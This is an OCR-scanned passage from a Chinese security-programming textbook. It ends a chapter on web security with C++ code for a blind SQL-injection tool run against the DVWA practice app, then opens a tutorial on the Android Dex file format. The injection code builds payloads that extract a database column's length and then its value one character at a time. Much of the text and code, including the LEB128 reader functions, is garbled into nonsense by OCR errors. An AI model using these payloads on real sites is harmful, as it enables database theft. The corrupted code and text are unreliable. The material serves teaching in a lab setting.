GetDlgItemText (IDC EDITS5, strNum); // 猜 解 第 几 行 
DWORD dwServiceType? // 服务 类 型 

CString strServer; // 服务 器 地 址 

CString strObjecty // URE 指向 的 对 象 

INTERNET PORT niPport; // 端口 号 


AfxParseURL(strUrl, dwServiceType, strServer, strObject, nPort); 
m SoanList,.InsertIitem(m ScanList.GetItemCount (), "开始 猜 列 值 长 度 "); 
// 求 长 度 
int nLen = 1; 
While ( nLen <= 64 ) 
CString StrUzl 1 
// and (select length (username) from user limit 1) = 5 
strUrl_1.Format ("S$s%%27+tand+%$s28select+lengths%28%sS%29+fromt+es+1imit+SsSe 
Cl%%29=%d+and+%%271%%27=%%271", ‘strObject, strField, strTable, strNum, nLen); 


m sock = socket (PEF_INET, 'SOCK STREAM; IPPROTO TCP); 
sockaddr in ServerAddr = { 0 }; 

ServerAddr.sin family = RAR INET; 
ServerAddr.sin port = htons(80); 
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ServerAddr .sin addr.Ss un.Ss addr = inet addr (strServer); 
corninect (m sock, (const sockaddr *)&ServerAddr, sizeof (ServerAddr)); 


char szSendPacket[1024] = {0 }; 
char szRecvPacket [0x2048] = { 0 }:; 
HttpGet (szSendPacket, strUr}l 1.GetBuffer(0), strServer.GetBuffer(0)); 


send(m sock,; szSendPpacket, strlen(szSendPacket), 0); 
recv(m sock, szRecvPacket, Ox2048, 0); 


Catring"strpacket; 
strPacket = SS2RecVBPacket 7 
14£ ( strpacket. Find(n strSign)y 1!= =1 ) 
t 

closesocket (m sock); 

break; 
} 


closesocket (m sock); 


nLen ++2? 
} 
CString num? 
num.Format ("%d"; nLen); 
m ScanList,InsertIitem(m Scanbist.GetItemCount (), num) 
m ScanList.InsertItem(m ScanList.GetItemCount (), “结束 稍 列 值 长 度 " ); 


} 
最 后 再 来 看 一 下 猜 解 列 的 值 ， 如 图 9-49 所 示 。 


URL 地 址 1127.0.0,1/dywa-1.9/vuinerabities/ sai/ ?7Sdbrik=Submiksid=1 型 斌 病夫 名 
特征 码 Frst name 
个 字符 型 个 获 信 型 个 搜索 型 








图 9-49 SQL 注入 字段 值 的 猜 解 


在 图 9-49 中 ， 需 要 手动 输入 猜 解 到 的 表 名 、 列 名 和 长 度 ， 当 猜 解 第 0 行 记 录 的 user 列 的 
长 度 后 ， 一 定 是 猜 解 第 0 行 记录 的 user 列 的 值 。 代 码 如 下 : 


void CsQLInjectToolsDlg: ;OnBnClickedButtonS() 


{ 
// 在 此 添加 控件 通知 处 理 程序 代码 
CSstring strTable; 
CSstring strField; 
CString strUrl; 
CString strNum; 
int nbLen; 


GetDlgIitemText (IDC EDIT]1, strUr1l); 
GetDlgItemText (IDC EDIT2, m strSign); 
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GetDlgrltemText (IDC_EDIT3, strTable); // 获取 猜 解 表 名 
GetDlgItemText (IDC EDIT4, strField); XY 列 名 
GetDlgitemText (IDC EDIT5, strNum); // 猜 解 第 几 行 
nLen = GetD1LIItemInt (IDC._ EDIT6); 


DWORD dwServiceType; // 服务 类 型 


CString strServer; // 服务 器 地 址 
CString strObject; //_URL 指向 的 对 象 
INTERNET PORT npPort; // 端口 号 


AfxParseURL(strUrl, dwServiceType, strServer, strObject, npPort); 
m ScanList.InsertItem(m ScanList,.,GetItemCount (), "开始 猜 列 值 "); 


CString strValue’» 
这 nl 二 

CString username; 
// 长 度 用 于 猜 解 每 一 位 


while ( i <= nLen ) 


{ 

// 这 里 猜 解 只 猜 解 小 写 的 字母 

// 这 里 在 实际 的 时 候 需 要 改 成 各 种 可 能 的 字符 

Ey Nt OT Ce ly) 

i 
CoOtrinoa Stuyrl ly 
// and (select ascii(mid(username, 1, 1)) from user limit 1) = 97 
strUrl 1.Format("%s$®$s27+and+®e$s28select+asciis$e28mid$%S28$Ss, SG, 1%%29%$29+ 
fromt%s+1imit+$Ss; 1%SS29=%Sd+and+$%271%S27=%S271"; 

stroObject, strField, i, strTable, strNum, c); 


m sock = socket (PF INET, SOCK STREAM, IPPROTO TCP); 

sockaddr in ServerAddr = { 0 }; 

ServerAddr.sin family = AF INET; 

ServerAddr.sin port = htons (80); 

ServerAddr.,sin addr.s un.S addr = inet addr (strServer); 

connect(m sock, (const sockaddr *)&ServerAddr, sizeof (ServerAddr)),， 


char szSendPacket[1024] = { 0 } 
char szRecvPacket [0x2048] = {0 1}; 
HttpGet (szSendPacket, strUrl 1.GetBuffer(0), strServer.GetBuffer{(0)); 


send{m sock, szSendPacket, strlen(szSendPacket), 0); 
EECV (m sock, szRecvPacket, 0x2048, 0)3; 


CSstring strPacket; 
strPpacket = szRecvPacket,; 
if ( strPacket.Find(m stzSign) != -1 ) 


{ 
// 拼接 猜 解 的 每 一 位 用 户 名 
username.Format ("%s%c", username, CC) 
closesocket (m sock); 
break; 


} 


closesocket (m sock); 
和 


username = username + "[ 猜 解 结果 ]"; 

m ScanList.Insertitem(m ScanList.GetIitemCount(), username)” 

m ScanList,InsertItem'(m ScanList,GetItemCount(), "结束 猜 列 值 "); 
} 


到 这 里 整个 的 关于 DYWA 系统 中 针对 安全 级 别 为 “Low” 的 “SQL Injection” 模 块 的 测 


试 和 利用 代码 就 完成 了 。 从 整个 代码 中 可 以 看 出 ， 对 于 实际 的 编码 而 言 是 没有 超出 本 书 前 面 
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的 知识 ， 所 遇 到 的 困难 可 能 是 读者 对 SQL 注入 这 部 分 不 是 很 了 解 ， 对 于 注入 构造 的 SQL 语 
句 没 有 接触 过 。 对 于 基本 的 掌握 SQL 的 使 用 是 不 复杂 的 , 没有 接触 过 的 读者 通过 少量 的 时 间 
即 可 学 会 。 对 Web 安全 感 兴趣 的 读者 ， 可 以 跟着 DVWA 系统 进行 练习 ， 因 为 DVWA 系统 已 
经 基本 涉及 了 Web 安全 领域 入 门 所 需要 掌握 的 常见 漏洞 ， 如 果 读 者 能 够 在 学 习 DVWA 的 过 
程 中 将 PHP 语言 学 会 (DVWA 就 是 PHP+MySQL 写 的 )， 通 过 阅读 DVWA 各 个 安全 级 别 的 
代码 ， 不 但 可 以 掌握 各 种 漏洞 的 形成 ， 还 能 够 学 习 到 如 何 编写 安全 的 Web 代码 ， 从 而 在 源头 
上 尽 可 能 地 杜绝 漏洞 的 产生 。 


9.4 总 结 


本 章 介绍 了 关于 网 络 安全 和 Web 安全 的 相关 知识 ， 并 开发 了 几 款 简单 的 演示 工具 。 对 于 
网 络 安全 而 言 ， 涉 及 的 内 容 非 常 广泛 ， 本 章 只 是 作为 实例 来 演示 了 其 中 的 一 点 ， 本 章 的 编码 
知识 没有 超出 前 面 章 节 介绍 的 内 容 ， 希 望 读者 可 以 举一反三 ， 真 正 把 编程 用 到 解决 实际 的 问 
题 当 中 ， 把 编程 当 作 更 方便 的 工具 来 进行 使 用 。 

如 果 读 者 对 Web 安全 感 兴趣 的 话 ， 可 以 更 多 地 关注 Web 开发 的 相关 知识 ， 在 了 解 和 掌 
握 了 Web 的 相关 开发 ， 比 如 PHP、Java、Javascript 等 后 ， 会 更 好 地 理解 和 掌握 Web 漏洞 的 
成 因 和 防护 ， 就 如 同 对 于 学 习 PC 端的 逆向 ， 首 先 需 要 掌握 汇编 、PE 结构 等 一 样 ， 是 相同 的 
道理 。 
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由 于 安 卓 系统 的 开源 和 各 大 厂商 的 支持 ， 安 卓 系 统 不 断 地 在 占领 着 移动 设备 的 市 场 ， 因 
此 本 章 对 安 卓 软件 安全 进行 初步 的 探索 。 重 点 在 对 安 卓 可 执行 文件 格式 〈Dex) 的 解析 。 

本 书 前 面 的 章节 主要 以 介绍 Windows 下 的 开发 为 主 ， 在 本 章 介绍 的 内 容 已 经 没有 关于 
Windows 平台 编程 的 知识 点 ， 但 是 仍然 以 VC 集成 开发 环境 来 编写 关于 Dex 文件 格式 的 解析 
代码 。 


10.1 安 卓 可 执行 文件 格式 解析 


在 本 书 的 前 面 章 节 介绍 过 Windows 下 可 执行 文件 格式 的 结构 ， 即 PE 文件 格式 。 本 节 主 
要 来 完成 一 个 安 卓 下 可 执行 文件 格式 的 解析 器 ， 对 有 意向 学 习 安 卓 软件 安全 ， 如 Dex 混 消 、 
加 固 、 病 毒 分 析 等 的 读者 可 以 起 到 一 个 抛砖引玉 的 作用 。 


10.1.1 准备 一 个 Dex 文件 


在 完成 一 个 安 卓 可 执行 文件 格式 解析 器 前 ， 首 先 需 要 准备 一 个 Dex 文件 来 进行 分 析 。 什 
么 是 Dex 文件 呢 ? 它 是 安 卓 平台 上 的 可 执行 文件 。 在 安 卓 平台 上 , 应 用 程序 都 以 Java 语言 作 
为 开发 语言 ， 但 是 它 并 没有 使 用 JVM (Java 虚拟 机 ) 作为 运行 环境 来 执行 ， 安 卓 的 设计 者 为 
它 重新 设计 了 一 套 虚拟 机 被 称 为 Dalvik。Dalvik 有 别 于 JVM， 首 先 它 编译 后 不 再 使 用 .class 
作为 扩展 名 ， 而 是 使 用 .dex 为 扩展 名 。 由 于 虚拟 机 不 同 ， 生 成 的 文件 不 同 ， 因 此 ， 它 也 有 一 
套 属于 自己 的 字 节 码 。 

在 使 用 传统 的 Java 编程 时 ,需要 安装 JDK。 对 于 安 卓 系统 下 应 用 的 开发 除了 需要 安装 JDK 
以 外 ， 还 需要 其 自身 的 PSDK， 即 安 卓 系统 的 平台 开发 包 。 对 于 Java 语言 而 言 ， 其 编译 生成 
文件 的 扩展 名 为 .class， 而 对 于 安 卓 开发 环境 生成 的 可 执行 文件 一 般 是 .apk。APK 文件 并 不 是 
一 个 独立 的 文件 , 它 是 由 多 个 文件 打包 而 成 的 。 在 APK 文件 中 ,除了 编译 后 的 可 执行 文件 以 
外 ， 还 包含 了 配置 文件 、 资 源 文 件 等 。APK 中 包含 的 可 执行 文件 .dex 文件 就 是 本 节 要 介绍 的 

下 面 来 说 一 下 获得 Dex 文件 的 方法 。 

1， 从 APK 中 提取 Dex 文件 

在 前 面 的 内 容 中 已 经 说 明 ，APK 文件 是 一 个 打包 过 的 文件 ， 其 中 包含 了 安 卓 程序 运行 所 
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需要 的 配置 文件 、 资 源 文件 和 Dex 可 执行 文件 等 。 看 到 这 里 , 读者 可 以 从 网 上 下 载 一 个 APK 
文件 ， 或 者 通过 安 卓 的 集成 开发 环境 编译 生成 一 个 APK 文件 。 将 得 到 的 APK 文件 的 扩展 名 
由 .APK 修改 为 .RAR (或 者 .ZIP 也 可 以 )， 这 样 就 可 通过 解压 缩 工具 (比如 WinRar) 打开 ， 
打开 该 .RAR 文件 后 可 以 看 到 APK 中 打包 的 相关 文件 ， 如 图 10-1 所 示 。 


WW META-INF 文件 夫 
届 res 文件 去 
AndroidManifest.xml 16 KB 1 KB XML 文件 


Lclasses.dex 606.8 KB ”207.8 KB DEX 文 件 
resources.arsc 2.1 KB 2.1 KB ARSC 文件 








图 10-1 通过 解压 缩 工 具 打 开 APK 文件 


从 图 10-1 中 可 以 看 到 打开 的 压缩 文件 中 有 res 目录 , 以 及 AndroidManifest.xml、 classes.dex 
文件 等 ， 将 classes.dex 文件 解压 缩 出 来 ， 就 得 到 了 稍 后 将 要 分 析 的 文件 。 

2. 通过 CLASS 文件 转换 Dex 文件 

通过 从 APK 文件 中 解压 提取 到 的 Dex 文件 体积 通常 比较 大 ， 对 于 初学 者 而 言 ， 较 大 的 文件 
在 进行 格式 分 析 的 时 候 并 不 方便 。 在 分 析 文 件 格式 时 ， 会 从 整体 上 了 解 文件 格式 的 结构 ， 然 后 去 
了 解 文件 结构 中 的 各 个 组 成 部 分 。 而 如 果 文 件 体积 较 大 的 话 , 在 分 析 各 个 组 成 部 分 时 比较 耗费 时 
间 ， 从 而 导致 不 能 快速 地 了 解 文件 的 整体 结构 。 因 此 ， 为 了 在 分 析 文 件 结构 时 ， 不仅 能 掌握 文件 
格式 的 整体 结构 ， 也 能 快速 地 完成 对 各 个 组 成 部 分 的 分 析 ， 就 需要 提交 一 个 较 小 的 Dex 文件 。 

这 里 通过 写 一 个 简短 的 代码 来 编译 生成 一 个 体积 较 小 的 Dex 文件 ， 要 自己 编译 生成 一 个 
Dex 文件 ， 一 共 分 为 3 个 步 又。 

Q) 写 一 段 简 单 的 Java 代码 。 

在 任意 文本 编辑 器 中 键入 如 下 Java 代码 : 


public class HelloWorld { 
publje static void main(Stringl] arga)t 





， svestem.out .println("Hello World!l")y 
上;» 
上 面 是 一 段 简单 的 Java 代码 ， 将 该 代码 保存 为 HelloWorld.java 文件 。 
@ 编译 生成 .class 文件 。 
编译 Java 源码 需要 安装 JDK，JDK 的 安装 比较 简单 ， 下 载 JDK 的 安装 包 ， 然 后 将 安装 
目录 配置 到 系统 的 环境 变量 中 就 可 以 通过 javac.exe 文件 来 对 Java 的 源码 进行 编译 了 。 
在 命令 行 下 编译 Java 文件 ， 编 译 方法 如 下 : 


d:\TestDex>javac -source 1.6 ~target 1.6 HelloWorld.ijava 


编译 后 会 生成 一 个 HelloWorld.class 文件 ， 运 行 该 文件 的 方法 如 下 : 


d:;\TestDex>java HelloWorld 

@) 转换 .class 文件 到 .dex 文件 。 

将 Java 的 .class 文件 转换 为 .dex 文件 ， 需 要 安装 安 卓 的 开发 环境 和 开发 包 ， 我 这 里 安装 
的 是 开发 安 卓 的 Eclipse。 在 安装 目录 下 的 \sdk\build-tools\android-4.3\ 有 一 个 dx.bat 文件 ， 通 
过 该 文件 即 可 完成 .class 文件 到 .dex 文件 的 转换 。 

切换 到 \sdk\build-tools\android-4.3\ 目 录 下 ， 执 行 如 下 方法 : 


dx ~--dex ~-output=HelloWorld.dex HelloWworld.class 


这 样 就 得 到 了 一 个 体积 非常 小 的 .dex 文件 供 学 习 分 析 使 用 。 








中 
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10.1.2 ”DEX 文件 格式 详解 


在 上 一 节 中 介绍 了 如 何 得 到 一 个 体积 较 小 的 Dex 文件 ， 本 章 就 使 用 它 来 完成 格式 的 分 析 。 
前 面 章节 分 析 Windows 下 PE 文件 格式 时 选择 使 用 了 C32Asm 十 六 进 制 分 析 工 具 ， 本 节 分 析 


Dex 文件 格式 选择 了 010Editor 这 款 十 六 进 制 分 析 工 具 。 
1. 010Editor 模板 


选择 010Editor 是 因为 它 提供 了 很 多 二 进 制 文件 的 解析 模板 ， 这 些 模 板 可 以 用 来 解析 文件 
的 格式 ， 比 如 图 片 格式 、 音 频 格式 、 视 频 格 式 等 ， 当 然 也 包括 解析 Dex 格式 的 模板 。 打 开 


010Editor 工具 ， 如 图 10-2 所 示 。 


Be Edt Search Yew Farmat Script emplates Tools Window Heip 
A 入 多 风力 大 咏 | 和 # 避 关 归程 灌 | 国 汪 习 儿 本 于 导 
LE ,a Lstetw 二 Mell owerld dnx MM 
y Open Fies FE i 
elloWorid.de vo0on: PE 65 18 OR 30 33 35 DO KS Gi I EF BF 32 DA SF dex035,0a,1220. 
eo lds vodhs' SD DD 32 92° 88 $4 29 49 EB 32 FF DS 71 68 15 718 be 
0020h: Es 02 90 00 10 00 00 90 15785 34 12 00 00 00100 | 
Facemt FHas oni|l 90 00 09 00 48 02 00:00 oF 0 00 00 TO 06 0 09  » 
> DestDer der nostn: D7 00 00 00 A Ho 0 6003 00 00 0 C4 90 0 HO 
鸯 DAProgram flea\.\DexTemplate bi COsSon: Oi 00 00 00 Ea 00 00 nn 04 O00 00 00 FO 00 0 90  . 
图 Bookmarked Fer v0eon: 01 O000 00 10 0 00 00 88 Of 96 00 30 01 00 99 - 
G970n: 5 1 的 0 TE NL oo Ho SODL Ho Ao SD 94 00 U0 
oan: SAB GE 000 oc OF 906 00106 83 00 00 EA oT 00..00 
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¥ favorie Fles 


: DA 95 90 000 0 0 0 0 0 
09 90.00 00 09 .80 00 00 68 0 Od OF 03 4 
+ 15 69 00 90 70 83 00 $904 bo 1 00 Sc 00 ol 
dd 00 00 00.00 0 00 00 00 od9 04 O00 Ou o0 Ot 
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mrst bewder itew des_header 
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图 10-2 010Editor 主 界面 


选择 010Editor 的 “Templates ”菜单 项 ， 单 击 “Online Templates Repository” 菜 单项 
会 打开 一 个 在 线 的 模板 列表 ， 如 图 10-3 所 示 。 


Products Downloads Store Support Company 
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图 10-3 010Editor 模板 列表 
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在 图 10-3 中 找到 BinaryTemplates， 然 后 单 击 鼠 标 右键 选择 “另存 为 ”将 其 保存 至 
010Editor 安装 目录 下 的 “010 Editor 602\010 EditorData” 路 径 下 。 然 后 启动 010Editor， 打 开 
生成 的 TestDex.dex 文件 ，010Editor 会 自动 匹配 模板 对 Dex 文件 进行 解析 ， 并 将 解析 的 结果 
显示 出 来 ， 如 果 没 有 显示 则 按 下 快捷 键 Alt+4 打开 “Template Results” 窗 口 ， 即 可 看 到 解析 
结果 ， 如 图 10-4 所 示 。 










Template Results — DexTemplate, bt 





Hame Yalu 
truct header_item dex, haader 
truct string id list dex_string_ids 14 string= 
truct type_id list dex_ type ids T types 
tyuat proto_id list dex proto ids 3 prototypes 
truct field id list dex_field ids 1 fields 
siruct method_i i st dex_method ids 4 mathods 
struct class def item list dex_ class def 1 clasze=s 
struct map ist type dex map_list 13 items 





图 10-4 Template Results 窗口 


在 一 开始 学 习 Dex 文件 格式 解析 的 时 候 , 能 有 一 个 参考 和 对 照 还 是 很 有 必要 的 。 就 好 比 在 
学 习 Windows 下 PE 文件 格式 时 ， 能 使 用 LordPE 等 解析 工具 去 对 照 学 习 会 方便 很 多 。010Editor 
既 可 以 直接 查看 十 六 进 制 数据 ， 也 可 以 查看 解析 后 的 数据 内 容 ， 当 然 是 首选 的 分 析 工 具 了 。 

2. 整体 认识 DEX 文件 结构 

DEX 文件 格式 的 结构 大 体 分 为 3 部 分 ， 第 一 部 分 是 Dex 头 部 ， 第 二 ME Dex 的 数据 


索引 ， 第 三 部 分 是 Dex 的 数据 内 容 。 如 图 10-5 所 示 。 Dex 头 部 MN 
在 Dex 头 部 会 给 出 一 些 基 本 的 信息 ， 比 如 文件 的 字 节 序 、 STRNGUTDS 


校 验 和 、 签 名 等 。 在 Dex 头 部 中 还 会 给 出 数据 索引 所 在 的 偏 移 。 beskde 引 ee 

和 索引 包含 的 数据 量 。 比 如 在 header 部 分 会 给 出 STRING IDS 

在 文件 的 偏 移 位 置 和 文件 中 包含 多 少 个 STRING ID。 | 
Dex 数据 索引 给 出 了 具体 资源 数据 所 在 文件 的 偏 移 位 置 。 Dex 数 据 < sb . 

比如 ，STRING _IDS 中 保存 了 具体 STRING 数据 在 文件 中 的 偏 Y 

移 位 置 。 图 10-5 Dex 文件 整体 结构 
Dex 头 部 、Dex 数据 索引 和 Dex 数据 的 关系 大 致 如 图 10-6 所 示 。 








Dex 数 据 索 





图 10-6 Dex 文件 索引 结构 


如 果 图 10-5 是 Dex 文件 格式 的 平面 结构 ， 那 么 图 10-6 就 是 Dex 文件 结构 通过 索引 的 方 
式 而 展现 的 立体 结构 了 。 两 幅 图 的 对 应 关系 也 可 以 很 明显 地 看 出 来 。 
Dex 文件 结构 的 定义 如 下 : 
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strauct DexFile { 
/* 直接 映射 的 "opt" 头 部 */ 
const DexOQptHeader* pOptHeader; 


/* 基础 DEX 中 直接 映射 的 结构 体 和 数组 的 指针 */ 


const DexHeader* pHeader; 
const Dexstringld* | pStringLds; 
const DexTypeld* plypelds; 


const DexFieldIid* prieldlidsy 
const DexMethodId* pMethodIds; 
Const DexProtold* DBProtoldsy 
const DexcCtassner* ,pClassDets; 


const DexLink* pLinkData; 
J/* 
x 这 些 不 映射 到 "auxillary" 部 分 ,不 包含 在 该 文件 中 
火 
RY 
const DexClassLookup* pClassLookup; 
const void* pRegisterMapPool; // RegisterMapClassPool 
A* 蕴 向 DEX 文件 开头 的 指针 */ 
COnsSt (WL baseAddr; 
/* 跟踪 辅助 结构 的 内 存 开销 */ 
int overhead; 
/* 其 他 与 DEX 相关 联 的 数据 结构 */ 
/MvoLd* auxData; 


地 


对 于 前 面 生成 的 文件 而 言 ，DexFile 结构 体 的 定义 有 所 不 同 ， 文 件 定义 如 下 : 
struet, Dextile 
/* 基础 DEX 中 直接 映 庙 的 结构 体 和 六 组 的 指针 i 
const DexHeader* pHeader; 
const DexSstringlid*, pStringLlds. 
Gonst DexTypeLtd* plypeids:} 
const DexFieldId* pFieldIds; 
const DexMethodId* pMethodlds; 
const DexProtold* PProtoldss 
const DexClassDef* ‘pClassDefs; 
const DexLink* pLinkData; 
上 


这 样 看 , Dex 文件 的 结构 体 定义 就 与 前 面 介绍 的 基本 相同 了 ， 可 以 看 到 有 DexHeader (Dex 
头 部 )、DexStringId、DexTypeId 等 结构 体 。 在 后 面 的 介绍 中 ， 就 以 该 结构 体 为 准 来 介绍 Dex 
文件 的 结构 。 

DexFile 结构 体 定义 在 安 卓 系统 源码 的 dalvik/libdex/DexFile.h 中 。 如 何 找到 这 份 文件 呢 ? 
打开 androidxref 网 站 ， 如 图 10-7 所 示 。 








" 2014-09-06 一 
» 2014-07-14 一 
sa 2014-06-06 — 
» 2014-03=25 一 
" 2014-01-08 一 
a 2013-11-01 - 
2013-10-31 一 
a 2013=09-30 =- New Index: 了 CS 一 4#.0.3 
2013=-07-25 一 New Index: JeliyBear ~ .3 
2013-04-22 — New Index: JellyBean — 

2013-25-02 一 
5 2022=-13-21 一 
a 2012-08-22 
























Gingerbread 一 





图 10-7 AndroidXRef 页 面 


薄 言 种 间 褒 潜 雪 闪 贡 己 小 











满 尖 悄 灿 并 并 二 再 山 己 识 


| 


第 10 章 安 卓 软件 安全 初探 





然后 在 AndroidXRef 页 面 上 选择 “JellyBean-4.1.1”( 这 里 笔者 选择 的 是 4.1.1 的 源码 进行 
学 习 )， 打 开 如 图 10-8 所 示 的 页 面 。 在 图 10-8 的 页 面 的 列表 中 选择 “dalvik” 选 项 ， 并 双击 
进入 对 应 的 源码 结构 中 ,如 图 10-9 所 示 。 在 图 10-9 中 选择 “libdex” 目 录 进 入 源码 列表 页 面 ， 
在 页 面 中 选择 “DexFile.h” 即 可 打开 DexFile 结构 所 在 的 头 文件 。 









Android XRef,w smai 


me EE aa 一 omveaaa 一 re 


Faull Search In Project(s) E 


Definition | abi 
| bionic 

Symbol | bootable 
File Path | build 


| 


er vv 
图 10-8 选择 dalvik 选项 








nem ee rm tie 


Home | History | Annatate 


ey ‘Date 5 
i 13-Jul-2012 4 KiB 
Android. mk 13-Jul-2012 1.9 KiB 
CleanSspec, mk 13-Jul-2012 2.7 KiB 
dalvikvway 13-Jul-2012 4 KiB 
dexdunp/ 13-Jul-2012 4 KiB 
dexgen/ 13-Jul-2012 4 KiB 
dexlist/ 13-Jul-2012 4 KiB 
dexopt/ 13-Jul-2012 4 KiB 
docs/ 13-Jul-2012 4 KiB 
dvz/ 13-Jul-2012 4 KiB 
xy 13-Jul-2012 4 KiB 


| libdex/ la-Tal-a0la 4 KiB | 

MODULE_LICENSE APACHE2 Tul-2012 

NOTICE 13-Jul-2012 10.4 KiB 
opcode—gen/ 13-Jul-2012 4 KiB 
README. txt 13-Jul-2012 2.5 KiB 
tests/ 13-Jul-2012 4 KiB 
tools/ 13-Jul-2012 4 KiB 
unit-—tests/ 13-Jul-2012 4 KiB 
va 13-Jul-2012 4 KiB 





图 10-9 选择 libdex 目录 


上 面 给 出 了 Dex 文件 的 整体 结构 ， 并 给 出 了 查看 安 卓 系统 源码 的 方法 。 读 者 可 以 通过 此 
方法 查找 自己 想 要 了 解 和 熟悉 的 安 卓 系统 的 源码 ， 从 而 深入 了 解 安 卓 操作 系统 的 源码 。 

3. Dex 文件 中 的 数据 类 型 

安 卓 系统 的 内 核 也 都 是 用 C++ 语言 实现 的 ， 但 是 在 其 源 代 码 中 ， 将 C++ 语言 中 原本 的 
一 些 数据 类 型 进行 了 重新 定义 。 从 DexFile.h 随便 找 一 个 数据 结构 的 定义 来 进行 查看 ， 有 具体 
如 下 : 


色 
* Direct=-mapped "mapritem 
oh 
struct DexMapltem { 

U2 Ep 

U2 unused; 

u4 Sizer 

aotfsety 
be 
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在 DexMapItem 数据 结构 中 有 类 似 u2、u4 这 种 数据 类 型 是 在 C++ 语言 中 没有 的 ,这些 数 
据 类 型 就 是 被 重新 进行 宏 定 义 过 的 数据 类 型 。 在 DexFile.h 头 文件 的 最 上 面 , 有 一 条 文件 包含 
的 语句 ， 具 体 如 下 : 


#ineclude "vm/Common.h” 


直接 单 击 Common.h 就 可 以 查看 到 一 个 搜索 的 列表 ， 如 图 10-10 所 示 。 


File Path vmCommonh 
History 


Searched path: “vm common . h” (Results 1 = 1 of 1) sorted by path 








图 10-10 Common.h 文件 


图 10-10 是 关于 “vm common . h” 搜 索 结 果 的 列表 ， 这 里 只 有 一 个 搜索 结果 。 直 接 
单 击 “Common.h” 打 开 该 文件 。 在 该 文件 中 就 可 以 看 到 ul、u2 等 数据 类 型 的 定义 ， 定 义 
如 下 : 


zs 

* 以 下 类 型 匹配 VM 规范 中 的 定义 

pk 

/ 
typedef uint8 t hs 
typedef uint16 七 U27 
typedef uint32 t Ud; 
typedef uint64 七 8; 
typedef int8 t 生计 沁 
typedef inti6 t s2; 
typedef int32 t Ss4; 
typedef int64 t s8; 


可 以 看 到 al、u2、u4 和 ug 这 些 数据 类 型 只 是 无 符号 的 整 型 ， 宽 度 分 别 是 1 字 节 、2 字 
节 、4 字 节 和 8 字 节 ，s1、s2、s4 和 s8 是 有 符号 的 整 型 ， 宽 度 也 分 别 是 1 字 节 、2 字 节 、4 
字 节 和 8 字 节 。 

在 解析 Dex 文件 结构 的 时 候 ， 还 有 一 种 数据 类 型 是 LEB128 (Little Endian Base 128)， 它 也 
分 为 有 符号 类 型 的 和 无 符号 类 型 的 ， 分 别 是 sleb128、uleb128 和 ulebl28p1。LEB128 是 由 1 一 5 
个 字 节 组 成 为 一 个 32 位 的 数据 。 每 个 32 位 的 数据 是 由 一 个 字 节 表示 还 是 由 两 个 字 节 组 成 后 进行 
表示 ， 取 诀 于 第 一 个 字 节 的 最 高 位 ， 如 果 第 一 个 字 节 的 最 高 位 为 1， 那么 就 需要 第 二 个 字 节 。 同 
理 ， 如 果 第 二 个 字 节 的 最 高 位 也 是 1， 那 么 就 需要 第 三 位 共同 构成 后 进行 表示 。 对 于 LEB128 类 
型 的 数据 ， 可 以 使 用 安 卓 系统 中 提供 的 算法 进行 读 取 ， 该 代码 在 /dalvik/libdex/Leb128.h 文件 中 。 
对 于 读 取 sleb128 和 uleb128 数据 类 型 的 函数 有 两 个 不 同 的 函数 ， 分 别 是 readSignedLeb128() 
和 readUnsignedLeb128()。 

dd 

和 的 vaa128 从 更 新 指向 已 读 取 值 未 尾 的 指针 ;该 函数 第 5 种 编码 类 型 中 的 非 零 高 阶 位 

革 避 INLINE int readSignedLebl28 (const ul** pStream) { 


const ul* ptr = *pStream; 
int TESULE = *(Btr++)? 
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TF" (mesolt ze 二 


第 esu1 = (xesult < D0) > 95 
10 } else { 
=e mnt our ttt 
rosalt a (result gy, Ox7E) Nr OTE Ce TY 
-a iF (Gun ee OATE) 【 
女 result = (result << 18) >> 18; 
卓 1 snse ! 
软 GUD (BE 
件 rasutt' l= (eur & Ox7F) Ce D4 
安 Oe Ey 
全 esSahtial (result < L1) >> "Ll 
初 } else { 
探 GU 二) 
resnlt, | (Gurl LOVE CS os 
ME (COM ie ORTREY LR 
restilt = (restdlt < a > ds 
} else 1{ 
/* 
* 注意 ， 不 检查 cur 是 否 越界 ， 这 意味 着 可 接受 高 4 阶 位 中 的 垃圾 
i 
Ci mw DE Eh 
result ls Cur a 28> 


} 


Wotraam ptr 
return result; 


} 
对 于 readUnsignedLeb128() 函 数 的 实现 如 下 : 


DEX_INLINE int readUnsignedLebl28 (const ul** pStream) 1 
Const ul*v ptrlm ptream; 
竺 家 蕊 || 全 SL 也 二 (及 七 下 牛市) 放 


har 
Py a het la a ih nen 
resuiltl= Neestilt a OaE) i (emr te 0w TE) 
ek (Aman 2 A Re 
Can WLrt 人 ts 
Et = es es Oe jd ee PF» 
WE ow > nO 
CD 
result ls (ear ie OxTE) << 
EOC, Om 


站 
* 注意 ,不 检查 cur 是 否 越界 ， 这 意味 着 可 接受 高 4 阶 位 中 的 垃圾 


的 
cur er 
po to st 4 Me 


} 


*pStream = ptr; 
TEtHEN TESULt» 


} 

对 于 在 分 析 Dex 文件 格式 时 ,， 遇 到 LEB128 类 型 的 数据 时 ,直接 调用 readSignedLeb128() 
或 readUnsignedLeb128() 函 数 进 行 数据 的 读 取 即 可 。 具 体 的 实现 也 不 复杂 ， 如 果 阅 读 有 不 明 
白 的 地 方 ， 那 么 就 单 步调 试 来 仔细 观察 每 行 代 码 的 执行 。 
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4. 分 析 Dex 各 结构 体 数据 结构 

通过 前 面 的 内 容 已 经 从 整体 上 认识 了 Dex 文件 格式 , 接 下 来 就 会 使 用 前 面 我 们 自行 编译 
生成 的 Dex 文件 来 进行 Dex 文件 格式 的 分 析 。 

(1) DexHeader 结构 体 

在 安 卓 系统 源码 的 /dalvik/libdex/DexFile.h 文件 中 ， 给 出 了 DexHeader 结构 体 的 定义 ， 该 
结构 体 中 描述 了 Dex 文件 的 基本 信息 ， 并 给 出 了 各 种 数据 索引 的 数量 和 偏 移 地 址 。 该 结构 体 
的 定义 如 下 : 

pk 


* Direct-mapped "header item” struct. 
#f 


struct DexHeader 1 
ul magic[8]; 
u4 checksum; 
ul signature[kSHAlDigestLen]; 
u4 fileSsizey 
u4 headerSize; 
4 endianTag; 
u4 linkSize; 
ut LIENKOFE:; 
U4 mapOff; 
u4 stringIldsSize’; 
4 | stringhadqsAEfs 
aa4 typeldssize; 
U4 typeldsOff; 
u4 protoIldsSize; 
u4 protoIdsOff; 
u4 fieldIdsSize; 
u4 fieldIdsOff; 
u4 methodldsSize; 
u4 methodIdsOff; 
u4 classDefsSize; 
u4 ‘classDefsOff£; 
ua datasize; 
u4 dataOff; 


}? 

DexHeader 结构 体 在 宏观 上 面 描述 了 Dex 文件 的 信息 ， 下 面 对 该 结构 体 中 的 字段 进行 描述 。 

